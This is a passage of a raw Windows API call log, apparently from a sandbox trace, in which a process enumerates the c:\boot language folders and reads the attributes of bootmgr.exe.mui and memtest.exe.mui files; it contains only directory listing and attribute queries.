"c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.683] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.683] FindFirstFileW (in: lpFileName="c:\\boot\\da-dk\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.683] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.683] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.683] GetFileAttributesExW (in: lpFileName="c:\\boot\\da-dk\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.685] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.685] FindFirstFileW (in: lpFileName="c:\\boot\\de-de\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.685] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.685] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.686] GetFileAttributesExW (in: lpFileName="c:\\boot\\de-de\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0038.691] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.691] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.692] FindFirstFileW (in: lpFileName="c:\\boot\\el-gr\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.692] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.692] GetFileAttributesExW (in: lpFileName="c:\\boot\\el-gr\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.692] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.692] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.692] FindFirstFileW (in: lpFileName="c:\\boot\\en-us\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.693] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.694] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.694] GetFileAttributesExW (in: lpFileName="c:\\boot\\en-us\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40)) returned 1 [0038.694] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.694] GetFileAttributesExW (in: lpFileName="c:\\boot\\en-us\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x6c8f1600, ftLastWriteTime.dwHighDateTime=0x1ca0428, nFileSizeHigh=0x0, nFileSizeLow=0xaa50)) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.695] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.695] FindFirstFileW (in: lpFileName="c:\\boot\\es-es\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.695] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.695] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.695] GetFileAttributesExW (in: lpFileName="c:\\boot\\es-es\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.696] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.696] FindFirstFileW (in: lpFileName="c:\\boot\\fi-fi\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.696] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.696] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.696] GetFileAttributesExW (in: lpFileName="c:\\boot\\fi-fi\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40)) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.697] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.697] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.697] FindFirstFileW (in: lpFileName="c:\\boot\\fonts\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.698] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.698] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.699] FindFirstFileW (in: lpFileName="c:\\boot\\fr-fr\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.699] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.699] GetFileAttributesExW (in: lpFileName="c:\\boot\\fr-fr\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40)) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.699] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.700] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.700] FindFirstFileW (in: lpFileName="c:\\boot\\hu-hu\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.700] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.700] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.700] GetFileAttributesExW (in: lpFileName="c:\\boot\\hu-hu\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240)) returned 1 [0038.701] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.701] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.701] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.701] FindFirstFileW (in: lpFileName="c:\\boot\\it-it\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.701] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.701] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.701] GetFileAttributesExW (in: lpFileName="c:\\boot\\it-it\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0038.702] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.702] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.702] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.702] FindFirstFileW (in: lpFileName="c:\\boot\\ja-jp\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.702] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.702] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.703] GetFileAttributesExW (in: lpFileName="c:\\boot\\ja-jp\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40)) returned 1 [0038.703] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.703] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.703] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.703] FindFirstFileW (in: lpFileName="c:\\boot\\ko-kr\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.704] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.704] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.704] GetFileAttributesExW (in: lpFileName="c:\\boot\\ko-kr\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650)) returned 1 [0038.704] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.704] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.704] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.704] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.704] FindFirstFileW (in: lpFileName="c:\\boot\\nb-no\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37ae40 [0038.704] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.704] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.705] GetFileAttributesExW (in: lpFileName="c:\\boot\\nb-no\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850)) returned 1 [0038.706] FindNextFileW (in: hFindFile=0x37ae40, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.706] FindClose (in: hFindFile=0x37ae40 | out: hFindFile=0x37ae40) returned 1 [0038.706] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.706] FindFirstFileW (in: lpFileName="c:\\boot\\nl-nl\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.706] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.706] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.706] GetFileAttributesExW (in: lpFileName="c:\\boot\\nl-nl\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0038.707] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.707] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.707] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.707] FindFirstFileW (in: lpFileName="c:\\boot\\pl-pl\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.707] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.707] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.707] GetFileAttributesExW (in: lpFileName="c:\\boot\\pl-pl\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0038.708] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.708] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.708] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.708] FindFirstFileW (in: lpFileName="c:\\boot\\pt-br\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.708] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.708] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.708] GetFileAttributesExW (in: lpFileName="c:\\boot\\pt-br\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040)) returned 1 [0038.709] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.709] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.709] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.709] FindFirstFileW (in: lpFileName="c:\\boot\\pt-pt\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.709] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.709] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.710] GetFileAttributesExW (in: lpFileName="c:\\boot\\pt-pt\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55359480, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40)) returned 1 [0038.710] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.710] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.710] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.710] FindFirstFileW (in: lpFileName="c:\\boot\\ru-ru\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.710] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.710] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.711] GetFileAttributesExW (in: lpFileName="c:\\boot\\ru-ru\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5537f5e0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0038.711] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.711] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.711] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.711] FindFirstFileW (in: lpFileName="c:\\boot\\sv-se\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.712] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.712] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.712] GetFileAttributesExW (in: lpFileName="c:\\boot\\sv-se\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0038.712] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.712] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.712] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.712] FindFirstFileW (in: lpFileName="c:\\boot\\tr-tr\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.713] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.713] FindNextFileW (in: 